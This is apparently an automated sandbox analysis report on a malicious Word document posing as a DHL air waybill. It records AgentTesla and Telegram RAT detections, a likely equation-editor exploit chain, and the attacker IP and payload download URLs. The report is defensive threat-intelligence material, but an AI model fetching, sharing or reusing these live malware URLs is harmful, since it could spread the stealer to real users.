Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.331cbe8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32ae9a8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.32e69c8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2192, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 679368 Sample: DHL_AWB.docx Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for dropped file 2->43 45 Multi AV Scanner detection for dropped file 2->45 47 13 other signatures 2->47 7 EQNEDT32.EXE 12 2->7         started        11 WINWORD.EXE 304 67 2->11         started        14 EXCEL.EXE 2 3 2->14         started        16 EXCEL.EXE 2 3 2->16         started        process3 dnsIp4 29 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->29 dropped 31 C:\Users\Public\vbc.exe, PE32 7->31 dropped 55 Office equation editor establishes network connection 7->55 57 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->57 18 vbc.exe 1 5 7->18         started        39 198.23.207.54, 49171, 49172, 49173 AS-COLOCROSSINGUS United States 11->39 33 ~WRF{61C0FE69-632E...B-CB8720AB2605}.tmp, Composite 11->33 dropped 35 C:\Users\user\AppData\Local\...\694BA9C1.doc, data 11->35 dropped 37 C:\Users\user\AppData\...\doc_200[1].doc, data 11->37 dropped file5 signatures6 process7 signatures8 49 Antivirus detection for dropped file 18->49 51 Multi AV Scanner detection for dropped file 18->51 53 Machine Learning detection for dropped file 18->53 21 vbc.exe 18->21         started        23 vbc.exe 18->23         started        25 vbc.exe 18->25         started        27 2 other processes 18->27 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.23.207.54
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.23.207.54/shp/doc_200.doc true
  • Avira URL Cloud: safe
 unknown
http://198.23.207.54/200/vbc.exe true
  • Avira URL Cloud: safe
 unknown